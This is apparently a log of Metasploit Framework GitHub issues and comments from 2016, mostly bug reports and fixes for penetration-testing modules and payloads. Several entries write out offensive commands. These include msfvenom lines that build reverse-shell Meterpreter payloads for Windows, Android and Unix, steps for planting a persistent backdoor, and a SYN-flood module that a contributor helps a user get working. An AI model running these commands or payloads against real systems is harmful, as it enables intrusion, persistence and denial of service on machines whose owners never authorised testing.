[2016-08-11 23:28] h00die commented on #7196
Kind of, but including arch and platform as well

[2016-08-12 01:13] purehate opened #7202 "tomcat_mgr_login module no longer displays the IP for the system its trying to loginto"
When scanning for default tomcat logins, the module used to display the IP of the box so if you scanned lots of boxes you would know which one you found default creds to. That is no longer the case.

[-] TOMCAT_MGR - LOGIN FAILED: admin:admin (Incorrect: )
[-] TOMCAT_MGR - LOGIN FAILED: admin:manager (Incorrect: )
[-] TOMCAT_MGR - LOGIN FAILED: admin:role1 (Incorrect: )
[-] TOMCAT_MGR - LOGIN FAIL

[2016-08-12 01:37] wvu-r7 commented on #7202
Repro'd here. This seems to be a problem with ```vprint_*``` as used by ```AuthBrute```.

[2016-08-12 16:29] pkhadka56 commented on #7153
@wchen-r7  not working. I checked the response and it is 301/302. If I replace "send_request_cgi" with "send_request_raw" then it will give me 200 response. I have inserted "puts res.code" and checked.

[*] Started reverse TCP handler on 192.168.1.5:4444
[*] example.com:80 - Enabling vulnerable V3 functionality...
200
[-] example.com:80 - Exploit failed: NoMethodError undefined method `[]' for nil

[2016-08-12 17:52] wchen-r7 commented on #7153
@pkhadka56 Sorry, just wanted to clarify right quick - did you try ```send_request_cgi!``` or ```send_request_cgi```? Notice the ```!``` at the end.

[2016-08-13 03:05] pkhadka56 commented on #7153
@wchen-r7 yep I noticed that. It gives same old error. nothing changed.

Exploit aborted due to failure: unreachable: Failed to enable the vulnerable V3 functionality

[2016-08-13 03:40] pkhadka56 commented on #7153
@wchen-r7  I created another sandbox and tried it. I get 200 response but with following error:

Exploit failed: NoMethodError undefined method `[]' for nil:NilClass

[2016-08-13 18:28] wchen-r7 commented on #7202
@wvu-r7 This is related to https://github.com/rapid7/metasploit-framework/pull/6950

[2016-08-13 23:05] devrajashwin commented on #7197
reallly awesome idea i support u bro

[2016-08-13 23:19] OJ commented on #7197
You don't ask for much do you!

:-|

[2016-08-14 00:56] m3tal commented on #7197
For

 CVE-2016-3745

ok

after It's so much work !

[2016-08-14 07:26] timwr commented on #7197
Any reason you would like this particular list of exploits? There are a few more here: https://source.android.com/security/bulletin/2016-08-01.html and here: https://source.android.com/security/bulletin/2016-07-01.html
I suspect the stagefright exploit is on its way. If there is a PoC available for any of the others feel free to post them here, it would help a lot.

[2016-08-14 11:43] zero77 commented on #7197
Yes it is a lot, but I would like to see other OS as widely supported as windows is with exploits and modules, and android seems a good OS to start with.

[2016-08-14 16:03] trueb0t opened #7206 "Problem running post-install step. Installation may not complete correctly"
I'm using Ubuntu 12.04LTS/amd64. Ruby version `ruby 2.3.1p112 (2016-04-26 revision 54768) [x86_64-linux]`, rubygems version 2.5.1. After unpacking have this two errors.

![_229](https://cloud.githubusercontent.com/assets/20445217/17650222/4db1cf2c-6251-11e6-96e2-8ef44f39fb78.png)
![_230](https://cloud.githubusercontent.com/assets/20445217/17650223/54558ad0-6251-11e6-9655-70cfcc263149.png)
Also, af

[2016-08-14 23:33] 0x42424242 commented on #7197
I'm sure the Metasploit developers would love to see your pull requests for these, but respectfully you're asking them for months and months of work, which I'm sure the dev's already have :) The beauty of open source is you can roll up your sleeves and contribute these exploits yourself if you think it would be valuable to everyone though!

Saying that, I'm sure probably half of these CVE's aren't

[2016-08-15 02:44] wvu-r7 commented on #7197
Peleus!

[2016-08-15 03:18] bcook-r7 commented on #7206
It appears you are installing the 32-bit version of the package on a 64-bit version of Ubuntu. Please use the 64-bit (x64) version of the installer, as the 32-bit installers should be going away soon (CC @cdoughty-r7).

The version of Ruby that you use with the rest of the system does not matter for the Metasploit Pro installer.

[2016-08-15 03:18] #7206 closed

[2016-08-15 16:23] wchen-r7 opened #7207 "Modules in ~/.msf4 cannot reload or rerun"
To reproduce this problem, save the following module as `~/.msf4/modules/auxiliary/test.rb`

[code]

Next, start msfconsole. And then do:

[code]

And then type `rerun`, you will probably get a backtrace like this:

[code]

If you just do `reload` instead of `rerun`, you might see this backtrace instead:

[code]

[2016-08-15 16:34] wvu-r7 commented on #7202
Just tested - definitely related.

[2016-08-15 18:14] wchen-r7 commented on #7202
👍

[2016-08-16 01:16] sempervictus opened #7211 "Net::SSH broken in L3 pivots"
## Steps to reproduce

1. Pivot a route over a meterpreter session
2. Execute ssh_login scanner module against a routed host with a working SSH service

## Expected behavior

Should get proper socket response, negotiation, and auth attempt

## Current behavior
[code]
Which is actually:
[code]

[2016-08-16 02:22] bcook-r7 commented on #7211
@egypt / @dmaloney-r7 - did you guys test pivoting with Net::SSH? That was the primary thing originally that complicated pulling in the upstream gem, IIRC.

[2016-08-16 02:40] kainpark7894 commented on #7056
regkey -> winlogin -> (special account) register key null -> enable_rdp -> no hide user

difference video 0:05 <> 0:49

OS : Windows7 64bit ultimate K version

[2016-08-16 11:01] AresS31 opened #7213 "Mimikatz Update"
Hi,

Could you please update the three years old version of Mimikatz packaged with Metasploit to the latest version released about a week ago which support up to the Windows 10 Anniversary version?

Thanks,
Alex

[2016-08-16 12:04] OJ commented on #7213
Work is already underway. It's not a simple change. Thanks!

[2016-08-16 12:04] #7213 closed

[2016-08-16 12:28] AresS31 commented on #7213
That's a good news. Thanks for your reply.

[2016-08-16 15:26] egypt commented on #7211
Yes, and it worked for me in the lab. @dmaloney-r7 can you take another look at this?

[2016-08-16 15:29] wvu-r7 commented on #7195
Can you ```ktrace``` the payloads for me?

[2016-08-16 15:38] wwebb-r7 commented on #7197
The three I had time to look at are mobile platform exploits, one being the CVE for Stagefright.  Just be sure to check back here every now and then and I'll see if I can put a dent in these.

[2016-08-16 17:48] wvu-r7 commented on #7207
Hmm, I don't get this on my setup.

[2016-08-16 17:49] wvu-r7 commented on #7207
Hmm, I don't get this on my setup.

[2016-08-16 20:16] egypt commented on #7211
Tracked this down to the same `Socket#getpeername` problem we had before just in a different place.

[2016-08-16 20:42] sempervictus commented on #7211
@egypt: thanks boss. Could you ref the last hunt for this bug? I'd like to take some time this evening to get assay on the full scope of it - long term planning for rex-socket/rex-proto gems.

[2016-08-17 03:56] #3860 closed

[2016-08-17 18:54] wchen-r7 commented on #4886
I actually have a different error:

[code]

[2016-08-17 18:55] #7201 closed

[2016-08-18 03:50] #7202 closed

[2016-08-18 12:20] madmike33 opened #7216 "Pbx Exploit Request"
It would be great if we can have this exploit in MSF
https://www.exploit-db.com/exploits/40232/

[2016-08-18 15:20] Meatballs1 opened #7217 "smb_login DB_ALL_USERS / DB_ALL_CREDS doesn't use known usernames without passwords"
use auxiiliary/scanner/smb/smb_login

add some users with blank passwords etc.

set DB_ALL_CREDS or DB_ALL_USERS to true (or both)

Only users with passwords/hashes are added to the cred collection in the module lines :105-106.

Presumably brute forcing passwords for users where you dont know there password is good thing :p

[2016-08-18 15:53] JohnMartinelli commented on #7216
I can write this. Anybody else want to help out?
On Aug 18, 2016 08:20, "madmike33" <notifications@github.com> wrote:

[2016-08-18 22:23] h00die commented on #7216
I actually started writing this earlier in the week before getting sidetracked.  VM is created (make sure to disconnect from Internet after install to prevent update).
Converted all code to Ruby, however, the module didn't work.  I must have mis-typed something somewhere.
Just need to debug it!

[2016-08-18 22:38] wchen-r7 commented on #7167
This looks more like a Meterpreter feature because ```client.sys.process.processes``` simply doesn't have this info. For example:

[code]

[2016-08-19 00:07] bcook-r7 commented on #7167
"ppid" is the Parent PID. You just nest children in their respective PPID's

[2016-08-19 00:07] wvu-r7 commented on #7167
Sniped! Beat me to it. :)

[2016-08-19 00:15] bcook-r7 commented on #7167
I shall do you the honor of implementing this. Sounds like a super nice thing to have.

[2016-08-19 00:19] wvu-r7 commented on #7167
Just implemented it. Will PR in a sec. :D

[2016-08-19 00:55] h00die commented on #7216
@JohnMartinelli if you want to take a stab at it, I can post up what i've done with it so far and you could finish it up.
I noticed there are LOTS of functions, so I tried to clean a bunch of them up (like the 3 or 4 clean_* functions all to one).

Up to you.  I got a VM, so I can always test once you PR it, and I'll volunteer to write the docs

[2016-08-19 01:31] wvu-r7 commented on #7216
I was looking at this, too...

[2016-08-19 01:34] h00die commented on #7216
The one gotcha I noted was after install, you reboot.  On first (maybe every?) boot, it downloads updates and will patch itself.
I don't mind someone else doing this with/without my code.  I got enough on my plate right now and dont want to hold this up

[2016-08-19 04:29] #7167 closed

[2016-08-19 19:35] shipcod3 commented on #7136
I would love to take on this one.

[2016-08-19 19:36] JohnMartinelli commented on #7136
Id be willing to help.
On Aug 19, 2016 15:35, "Jay Turla" <notifications@github.com> wrote:

[2016-08-19 20:16] shipcod3 commented on #7136
@wchen-r7 and @JohnMartinelli, this has been taken care off. Lemme know what needs to be edited or added.

[2016-08-19 22:45] Cains1978 opened #7224 "x64 payloads crashing rundll32 on target machine causing session to die"
## Steps to reproduce

This issue pertains to the following payloads:
/windows/x64/meterpreter/reverse_http
/windows/x64/meterpreter/reveres_https

How'd you do it?
creating reverse_http payload and handler
1. msfvenom -p windows/x64/meterpreter/reverse_http LHOST=[public IP of handler] LPORT=80 -a x86_64 -f exe -o /root/Test/test-http.exe
2. use exploit/multi/handler
    set PAYLOAD windows/x64/m

[2016-08-19 22:47] vysec commented on #7224
Rundll**32**

[2016-08-19 23:04] Cains1978 commented on #7224
"Rundll32"
So I have already gleaned that targeting a 32bit process with a 64bit payload is bad and causing it to crash. I guess the real question would be if the payload is 64bit, why is it interacting with a 32bit process? Is this an issue with a setting in the payload which could be modified?

[2016-08-20 08:01] madmike33 commented on #7216
@johnmartinelli feel free to colaborte with @h00die

[2016-08-20 08:05] madmike33 commented on #6383
@h00die any updates on this :)

[2016-08-20 10:47] demolen opened #7225 ""Auxiliary failed: ArgumentError unknown SSL method `SSLv3'"
running vmauthd_login and vmauthd_version  modules results in :

"Auxiliary failed: ArgumentError unknown SSL method `SSLv3'." error.

with the following call stack:

[code]

[2016-08-20 12:42] h00die commented on #6383
After carefully re-reading the vulns, its not as simple as I thought.  A bunch of new WP functionality needs to be written or expanded (or import a gem).  I started doing that, wrote a bunch of the new functionality, and then the code disappeared.  I think I accidentally wrote it in a branch I deleted, or something of that nature.
Got disenfranchised losing all the work I put in, and haven't looke

[2016-08-20 16:13] kofs opened #7226 "meterpreter android commands missing"
today after i update and upgrade kali android commands in meterpreter session are missing .
what i have to do ?
is this a bug?
how can i fix it?

[2016-08-20 17:24] busterb commented on #7225
I think this is occurring because the version of OpenSSL that Kali Linux is built with appears to no longer support SSLv3, but metasploit assumes that SSLv3 support is always available.

[2016-08-20 17:24] busterb commented on #7226
did you try 'load android' ?

[2016-08-20 17:28] kofs commented on #7226
no
where i have to run this?

[2016-08-20 17:29] busterb commented on #7226
from the meterpreter> prompt

[2016-08-20 17:38] busterb commented on #7226
will check to see if there is something that's preventing automatic loading of the extension on android sessions

[2016-08-20 17:44] kofs commented on #7226
thank you so much
its works
how can i set it on automatic loading?

[2016-08-20 18:32] demolen commented on #7225
so is there any work around?
and is this something to do with the ruby 2.3.0 support for sslv3?

[2016-08-20 19:51] bcook-r7 commented on #7225
You hit the nail on the head. Ruby 2.3.0 supports it, but Kali has it disabled. You would need to ping them about changing it. This is the same root cause as #6783, so I'm going to close this in favor of that.

[2016-08-20 19:51] #7225 closed

[2016-08-21 11:17] demolen commented on #7225
OK, I tried removing no-ssl3 no-ssl3-method off the OpenSSL source, compiling and reinstalling it again. but it still throws the same error.

[2016-08-21 13:37] psyqologicaL opened #7227 "x86/windows version of Meterpreter is not supported with this Script!"
## Steps to reproduce

How'd you do it?

1. Infect a Windows 10 virtual machine with a python reverse https payload from Veil Evasion
2. set multi/handler
3. set PAYLOAD windows/meterpreter/rev_https
4. set LHOST [IP address]
5. set LPORT [Port]
6. run persistence -U -i 5 -p [Port] -r [IP address]

My Kali Linux OS is 64 bit (arch -> x86_64) and my Windows 10 virtual machine is 64 bit as well. I i

[2016-08-21 15:39] h00die commented on #7195
This may be partially that I just don't know how to generate a good netbsd payload...
I tried setting `--platform netbsd` and the platform isn't compatible w/ the bsd/x64/shell_reverse_tcp payload.
So I switched it back to just bsd, which I guess is FreeBSD, and added `-f elf`.  Figuring, I made a payload file, but didn't make an executable one.  duh.
Now I simply get `-sh: Cannot execute ELF bina

[2016-08-21 16:30] bcook-r7 commented on #7227
This was fixed last week in #7212 - it is resolved in 4.12.21 and later.

[2016-08-21 16:30] #7227 closed

[2016-08-21 20:59] demolen opened #7229 "NameError uninitialized constant Rex::Socket::SSHFactory"
ubiquiti_airos_file_upload module returns the following error:

[code]

produced in Metasploit v4.12.22-dev-87d34cf

 installed via apt, updated via git pull/ also confirm on msfupdate-d 4.12.20

Ruby 2.3.1p112

Kali (latest Rolling)

[2016-08-21 21:26] wvu-r7 commented on #7195
Yeah, you were generating raw shellcode instead of an executable. :)

I swore we had NetBSD support, but all I can find is FreeBSD, which we already knew. I think you're SOL unless you have FBSD binary emulation.

How did you get the exploit compiled on the target system? Or is this the step you're stuck at? (I was looking at this vuln, too.)

[2016-08-21 22:07] h00die commented on #7195
Don't remember what exploit I saw that did this, but I used `Metasm::ELF.compile_c(architecture, code).encode_string` .  Then, `write_file`, which fails.

Now i'm wondering if its safer to maybe transfer it all as a ascii, then just run a gcc compile on the remote system.  I do believe gcc is installed by default on FreeBSD... Maybe I'll go that route in the next few days and see where it takes me

[2016-08-21 22:08] h00die commented on #7195
This also loops back to #7196 where it would be awesome to be able to select platform NetBSD and see which payloads are viable.  No need to keep guessing...

[2016-08-21 23:25] bcook-r7 commented on #7225
You would need to recompile ruby too, I believe.

[2016-08-21 23:34] OJ commented on #7224
There's no doubt you're mixing architectures here for sure.

It would help if you showed how rundll32 is invoked. That isn't clear from the steps above, as they only show the steps you've taken to create a payload that runs directly as an exe.

[2016-08-21 23:50] h00die commented on #7195
Seems neither method works.
If you have any ideas, I'd love to hear them.  I think there's just not enough NetBSD support at this point.  Maybe a new write method in `lib/msf/core/post/file.rb`'s `_write_file_unix_shell` [function](https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/post/file.rb#L411)

See output here: https://github.com/h00die/metasploit-framework/blob/f2e2cb6

[2016-08-22 14:55] dmaloney-r7 commented on #7229
@bcook-r7 I am unable to reproduce this issue, although a possible fix should be fairly easy regardless, it's just a require issue. for whatever reason the user's system is not loading the class we use as a bridge to the upstream net-ssh gem.

[2016-08-22 14:58] bcook-r7 commented on #7229
@dmaloney-r7 have you tried it on Kali Rolling? Could just be a load order issue, where we're missing an explicit require somewhere.

[2016-08-22 16:00] dmaloney-r7 commented on #7229
@bcook-r7 that's exactly what i think it is, and in https://github.com/rapid7/metasploit-framework/pull/7232 i've added an explicit hard require that should fix the issue

[2016-08-22 16:57] #7136 closed

[2016-08-22 20:15] #7226 closed

[2016-08-22 20:18] bcook-r7 commented on #7188
Could you clarify the internal issues involved? We had a lot of requests before to _allow_ this because it made things like tunneled sessions possible.

https://github.com/rapid7/metasploit_data_models/pull/137

[2016-08-22 20:18] bcook-r7 commented on #6876
This appears to be resolved.

[2016-08-22 20:18] #6876 closed

[2016-08-22 20:20] bcook-r7 commented on #7198
This is kind of a heavy lift for a feature request. It could potentially be an entire project on its own.

[2016-08-22 20:20] #7198 closed

[2016-08-22 20:21] bcook-r7 commented on #7197
This is scoped too large for a feature request, sorry.

[2016-08-22 20:21] #7197 closed

[2016-08-22 20:22] bcook-r7 commented on #6632
This is implemented now :)

[2016-08-22 20:22] #6632 closed

[2016-08-22 20:29] bcook-r7 commented on #6973
I don't think there is a real issue here. The commands you displayed just start the handler (should be 'exploit/multi/handler' anyway). But, you need to actually start the payload via some other means, such as the user clicking a generate apk, social engineering, a secondary exploit, etc.

[2016-08-22 20:29] #6973 closed

[2016-08-22 20:30] bcook-r7 commented on #6963
@fullmetalcache would you care to submit a pull request for this?

[2016-08-22 20:33] bcook-r7 commented on #6952
Did you try it without using veil evasion?

[2016-08-22 21:12] bcook-r7 commented on #7226
auto-loading is now resolved with @timwr 's fix above. Thanks a lot!

[2016-08-23 04:48] sempervictus commented on #7224
OJ's completely right: the execution context of the bin generated by msfvenom is (most likely) 32bit. I was working on a Heavens Gate approach to several other manifestations of this concern a couple years back, but realized quite quickly that we'll be out of all 32b apps in a few years and that its not worth the effort. I think you may want to try this via psexec targeting all 64b arch components

[2016-08-23 04:51] sempervictus commented on #7229
@demolen: Thank you for the report. You caught framework at a bad time - we're trying to separate out all components which are not specifically written by the community. SSH is in progress now. @devs are working hard to fix the edge cases here. Please bear with us, and if possible, please merge, test, and report on issues found in the exec paths around SSH.

[2016-08-23 04:52] sempervictus commented on #7216
Again, a target which makes me wonder why i do this job. If developers work like this, defenders will never win/sleep.

[2016-08-23 07:48] madmike33 commented on #7216
Defenders wouldnt exist if there arent any attackers, however the aim here is White not Black.....
:)

[2016-08-23 08:17] Meatballs1 opened #7234 "ssh_identify_pubkey not working"
I ssh with a known user and ssh private key and it logs in fine `ssh -i FILE user@HOST`

Using ssh_identify_pubkeys:

[code]

returns:

`User x does not accept key 1`

Key isn't encrypted or anything.

[2016-08-23 13:51] SJCaldwell commented on #6363
My team and I are experiencing the same behavior.

[2016-08-23 19:13] #7211 closed

[2016-08-23 19:24] wvu-r7 commented on #7234
Repro'd here on latest and with #7232 landed.

[2016-08-23 19:55] #7160 closed

[2016-08-23 19:55] #7175 closed

[2016-08-23 19:55] #7229 closed

[2016-08-23 20:08] wvu-r7 commented on #7175
Oops, this was a dupe of #7160.

[2016-08-23 20:20] egypt commented on #7195
How did you get the initial shell you used for trying to upload the payload?  I'm guessing that  `_write_file_unix_shell` is failing because `cmd/unix/reverse` uses telnet, which mangles `\xff` bytes.

[2016-08-23 23:34] attackdebris opened #7236 "auxiliary/scanner/smb/smb_login ignoring CPORT directive"
## Steps to reproduce

I'm attempting to run an auxiliary/scanner/smb/smb_login with a CPORT defined e.g. 9000

## Expected behavior

The smb login attempt should be conducted via source port 9000 (or whatever CPORT is defined)

## Current behavior

The smb login attempt is being conducted via arbitrary source ports even when CPORT is defined. Confirmed via several different packet captures / diff

[2016-08-24 03:27] mubix opened #7237 "Feature Request: Disable SMB detection of "any credential" detection"
The SMB_LOGIN module checks automatically if "any" credentials could be used to authenticate to the target. While this is important for validation it also adds a possible indicator of compromise without any warning or option to turn off.

Basically it would be nice if there was an advanced feature that "Enable detection systems accepting any authentication" that was enabled by default but would ha

[2016-08-24 03:43] wvu-r7 commented on #7237
Yuck, it does run by default:

[code]

Fixing. Can you merge quickly?

[2016-08-24 04:17] wvu-r7 commented on #7237
Doesn't hurt to let other eyes check it. Up to you.

[2016-08-24 14:40] #7155 closed

[2016-08-24 15:22] egypt commented on #3878
Sounds like this was resolved some time ago.

[2016-08-24 15:22] #3878 closed

[2016-08-24 15:46] egypt commented on #5574
Haven't seen any updates here, I'll assume it was a terminal issue.

[2016-08-24 15:46] #5574 closed

[2016-08-24 23:48] h00die commented on #7195
@egypt ./msfvenom -p cmd/unix/reverse lhost=172.16.152.1 > /tmp/bsd.payload

#nailed_it

I'll see if i can jimmy up netcat or something else to get a shell back on the box so I can continue with this exploit dev

[2016-08-25 15:44] h00die opened #7241 "msfvenom Platforms output alphabetic"
`msfvenom --help-platforms`
The output is similar to:
[code]
I think this list would be much better alphabetically sorted

[2016-08-25 16:00] h00die commented on #7195
cmd/unix/reverse_openssl *seems* to work!
Got my ascii file across anyways, so hopefully I'll get the mail.local priv esc all finished up over the next few days

[2016-08-25 16:40] wchen-r7 opened #7242 "jenkins_script_console does not seem to work against later versions"
It seems later versions of Jenkins still use the script console by default without auth, but the exploit keeps requesting this path: ```j_acegi_security_check```, and it can't find it (HTTP 404). So it looks like this module needs an update.

Jenkins ver. 1.637

[2016-08-25 16:45] User0815 opened #7243 "Feature request: reverse_http_rc4"
When attacking an internal network where the command&control server is on the internet, you sometimes  can't use reverse_tcp_rc4 because  external servers can only be reached via a HTTP proxy, and you also can't use reverse_http or reverse_https if they inspect the traffic on the proxy and the clients trust the corporate CA. Encrypting the data inside the HTTP requests (e.g. with RC4) should solve

[2016-08-25 16:52] #7237 closed

[2016-08-25 16:56] wvu-r7 commented on #7195
@h00die: Luckily, ```cmd/unix/reverse_openssl``` uses ```s_client -quiet```. If it didn't, any line beginning with R would renegotiate the session, and any line beginning with Q would close the connection. Hat tip @bcook-r7. :-)

[2016-08-25 17:58] #7195 closed

[2016-08-25 19:05] wvu-r7 commented on #7241
Done.

[2016-08-25 19:46] #7241 closed

[2016-08-25 21:31] #4885 closed

[2016-08-25 21:50] pbarry-r7 commented on #4885
Apologies for the delay, tested and merged!

[2016-08-26 21:19] wchen-r7 opened #7247 "glassfish_deployer cannot upload the malicious war file"
Setup is a Windows Server 2008 + Java 1.8 + GlassFish 4.0. Similar to [this setup](https://github.com/rapid7/metasploit-framework/pull/3716). For some reason, GlassFish gets the following error:

[code]

While the war file can be uploaded manually (generated by the exploit), and get a session.

[2016-08-26 23:02] h00die commented on #7216
just finished #7245 so i'll start working on this again this weekend, hopefully with some luck i'll get it done!

[2016-08-27 00:02] jduck commented on #6740
Hopefully in September. We'll see.

[2016-08-27 20:32] h00die commented on #7216
@JohnMartinelli Another pentest just came in, i wont have time to get to this soon if you want to give it a go this week

[2016-08-27 20:42] JohnMartinelli commented on #7216
I'm on it. My weekend is free. Ill send you a message on Github

On Aug 27, 2016 16:32, "h00die" <notifications@github.com> wrote:

[2016-08-27 20:46] h00die commented on #7216
I'll still volunteer to write the docs and such if you want the assistance.  I hate when PRs are submitted w/o docs now

[2016-08-28 08:35] aidenstewart commented on #7227
I have this problem too, in version **4.12.22-dev**. i am trying to persistent a backdoor on a windows7 x86 system by this command on meterpreter:
`run persistence -U -i 5 -p [PORT] -r [IP]
`

[2016-08-28 12:27] lazurens opened #7249 "Install Bundle Gems Problem"
- What did you do?

  I ran the command `/home/res/.rvm/gems/ruby-2.3.1@metasploit-framework/bin/bundle install`
- What did you expect to happen?

  I expected Bundler to install gems so I can run (./msfconsole)
- What happened instead?

  Instead, what actually happened was unexpected error showing the following details:

Error details

[code]

Environment

  Bundler   1.12.5
  Rubygems  2.5.1

[2016-08-29 05:45] busterb commented on #7227
kali-rolling only seems to ship 4.12.21-dev (which I verified works as expected). How did you install 4.12.22-dev @aidenstewart ?

[2016-08-29 13:14] bcook-r7 commented on #7249
It looks like you have permissions issues, if you look carefully at the top line of the backtrace. Please check that you do not have files in your home directory owned as 'root'. Likely you have mixed running 'sudo' with non-sudo, and it has installed root-owned files in random places. If you are using 'rvm' correctly, you should not ever have to specify the full path like that.

Also, please veri

[2016-08-29 16:26] wchen-r7 commented on #7247
Ubuntu 16 + GlassFish 4.0 (same zip) doesn't seem to have this problem at all.

[2016-08-29 18:33] bwatters-r7 commented on #7236
Thanks for the catch @attackdebris !

[2016-08-30 05:58] wvu-r7 commented on #7236
Closing manually.

[2016-08-30 05:58] #7236 closed

[2016-08-30 08:08] fullmetalcache commented on #6963
@bcook-r7 Created =)

https://github.com/rapid7/metasploit-framework/pull/7253

[2016-08-31 07:33] tomy1989 opened #7259 "when i click on the app the app stopp working why?? i use msfvenom ip android/meterpreter/reverse_tcp lhot=(myip) lport=(myport)R > shell.apk"
## Steps to reproduce

How'd you do it?
1. ...
2. ...

This section should also tell us any relevant information about the
environment; for example, if an exploit that used to work is failing,
tell us the victim operating system and service versions.
## Expected behavior

What should happen?
## Current behavior

What happens instead?

You might also want to check the last ~1k lines of
`/opt/metasp

[2016-08-31 08:31] hktalent opened #7260 "John error in mac os"
**use auxiliary/analyze/jtr_mysql_fast**
run

[*] Wordlist file written out to /var/folders/k5/n1bnf5d57lj_b_zz8zyxrdn80000gn/T/jtrtmp20160831-66863-yn5egi
[*] Hashes Written out to /var/folders/k5/n1bnf5d57lj_b_zz8zyxrdn80000gn/T/hashes_tmp20160831-66863-gz6l4v
[*] Cracking mysql hashes in normal wordlist mode...
Unknown option: "--nolog"
[*] Cracking mysql hashes in single mode...
Unknown option

[2016-08-31 14:21] timwr commented on #7259
Hi tomy1989. We're going to need a bit more information here. E.g what phone? What os? If the app is crashing could you provide the output from ```adb logcat``` please?
https://developer.android.com/studio/command-line/logcat.html

[2016-09-01 00:17] wchen-r7 commented on #7242
I might have to grab this, because I need this to work.

[2016-09-01 02:16] OJ commented on #7188
People are being screwed by this on a regular basis. I get a question about things breaking every couple of weeks, especially from those doing the PWK course from Offsec. People set up pivots through SSH and then set `RHOST` to `127.0.0.1` to hit the pivot, things go bad from there.

So this gets a +1 from me. Adding a warning or not letting it happen would be great. I'm sure there's internal $REA

[2016-09-01 02:56] RoganDawes commented on #7188
In my experience, while developing USaBUSe, staging meterpreter through a localhost socket relay with LHOST=127.0.0.1 failed randomly, while doing exactly the same, with LHOST=127.0.0.2 (degrading to 0.0.0.0 on "exploit" since 127.0.0.2 did not exist) was consistently successful.

Chain was:

powershell stager->localhost:65535->USB HID->TCP 23->socat - TCP:localhost:4444->msfcli

[2016-09-01 04:46] wchen-r7 commented on #7242
Kind of weird, I no longer have this problem. Maybe it was just some kind of misconfiguration on my part:

[code]

Closing.

[2016-09-01 04:46] #7242 closed

[2016-09-01 06:07] wvu-r7 commented on #7260
I assume you used Homebrew to install John the Ripper. Try ```brew install john-jumbo```. It has ```--nolog```

[2016-09-01 06:07] wvu-r7 commented on #7260
I assume you used Homebrew to install John the Ripper. Try ```brew install john-jumbo```. It has ```--nolog```.

[2016-09-01 13:31] JohnSmith311 opened #7264 "Synflood Error"
## Steps to reproduce

Just as usual, following the same steps on every guide but i get this error instead of synflood doing its job!

msf auxiliary(synflood) > exploit

[*] SYN flooding "ip goes in here" ...
[-] Auxiliary failed: NoMethodError undefined method `<=' for nil:NilClass
Did you mean?  <=>
[-] Call stack:
[-]   /usr/share/metasploit-framework/modules/auxiliary/dos/tcp/synflood.rb:57:in

[2016-09-01 14:12] void-in commented on #7264
This is definitely a problem with this module. Unless a PR is generated for this, set the NUM datastore option to 0 and then run the module.
[code]

[2016-09-01 21:08] JohnSmith311 commented on #7264
Thanks Void-in!
I set num to 0 and it runs properly now!

[2016-09-01 21:08] #7264 closed

[2016-09-02 05:24] #7260 closed

[2016-09-02 06:36] hktalent commented on #7260
thanks
brew uninstall john
brew install john-jumbo
so is ok

Cracking mysql-sha1 hashes in incremental mode (Digits)...
Invalid options combination or duplicate option: "--incremental=Digits"
Warning: passwords printed above might not be all those cracked
Use the "--show" option to display all of the cracked passwords reliably

[2016-09-02 21:10] R3nPi2 opened #7267 "Wrong IDs on openvas plugin"
When runing `openvas_*` command that involves any ID like `openvas_target_delete <id>`, it does nothing.

The problem seems to be that openvas stores IDs like a long string similar to "698f691e-7489-11df-9d8c-002264764cea" and functions defined on `plugins/openvas.rb` are showing and requiring numeric IDs. When this numeric IDs are passed to functions on gem `ruby-2.3.1/gems/openvas-omp-0.0.4/lib/

[2016-09-05 07:06] hktalent opened #7275 "Nmap: Starting Oracle bruteforce with 1035 credentials against SID 'XE'... is error"
mac os x 10.11.6
metasploit ver: metasploit v4.12.24-dev-58112d7

**1**
use auxiliary/scanner/oracle/oracle_login
**2**
show options
Module options (auxiliary/scanner/oracle/oracle_login):

   Name              Current Setting                                                                             Required  Description
   ----              ---------------

[2016-09-05 07:12] hktalent commented on #7275
set RPORTS 1521,49163,49161,49160
 so is Ok

[2016-09-05 07:12] #7275 closed

[2016-09-05 07:23] hktalent commented on #6332
where is weblogic exploit module download?

[2016-09-05 12:42] h00die commented on #7216
@JohnMartinelli hows it going?

[2016-09-05 19:27] h00die opened #7277 "ftp client module busted"
I'm writing a new admin/scanner/ftp module, however whenever I do a check, i get:
[code]
This happens for my module, as well as the other ftp traversal modules (like this pcman one).
Whenever I run exploit on my or other ftp_traversal modules:
[code]

Same error on mine, as well as this pcman one.
This is with my git updated repo (as of today) as well as my kali apt-get pulled version.
Can someone

[2016-09-05 19:31] wvu-r7 commented on #6332
It doesn't exist.

[2016-09-05 19:34] h00die commented on #7277
i'll also point out, i dont think its my box or install since 08-067 works fine:
[code]

[2016-09-05 20:40] wvu-r7 commented on #7277
Did you copy any code? ```data_disconnect``` shouldn't be run unconditionally unless you're sure you have a data channel. I'll fix this in the library so it won't bite users of the mixin.

[2016-09-05 20:46] h00die commented on #7169
not enough interest for the time investment required.

[2016-09-05 20:46] #7169 closed

[2016-09-05 20:47] h00die commented on #7277
i did, but it was from the bison_ftp_traversal module.  Which would mean bison, pcman, and my new one are all not working

[2016-09-05 20:51] wvu-r7 commented on #7277
That is correct.

[2016-09-05 20:53] h00die commented on #7277
looks like all of the ftp_traversals in aux/scanner/ftp have the same issue. were you able to recreate on your end? want to santiy check my install...
[code]

[2016-09-05 20:53] wvu-r7 commented on #7277
Yes.

[2016-09-05 21:02] h00die commented on #7277
will this fix just the exploit method, or the check method as well?

[2016-09-05 21:10] wvu-r7 commented on #7277
Just ```exploit```. Under what circumstances do you get the ```check``` failure? It's not an error, and connection errors for ```check``` should be handled in the module. The ```check``` code already handles a bunch of them.

[2016-09-05 21:11] wvu-r7 commented on #7277
Just ```exploit```. Under what circumstances do you get the ```check``` failure? Connection errors for ```check``` should be handled in the module. The ```check``` code already handles a bunch of them.

[2016-09-05 21:13] h00die commented on #7277
i'm unable to get any of the ftp_traversal module's `check` to work at all. should be simple, use module, set rhosts, check.  and i just get this for each of them:
[code]

[2016-09-05 21:15] wvu-r7 commented on #7277
Well, it's just a banner check, so what happens when you test with ```ftp``` at the command line? Or ```netcat```?

[2016-09-05 21:21] h00die commented on #7277
ugh, meant to include that in the orig ticket.
[code]

no problems.

[2016-09-05 21:22] wvu-r7 commented on #7277
Strange, I can't repro. This seems like a separate issue from ```data_disconnect```.

[2016-09-05 21:38] wvu-r7 commented on #7277
Do you have a pcap to compare against? You should open a separate ticket per bug.

[2016-09-05 21:42] wvu-r7 commented on #7277
https://stackoverflow.com/questions/900042/what-causes-the-enotconn-error

[2016-09-05 21:56] h00die commented on #7277
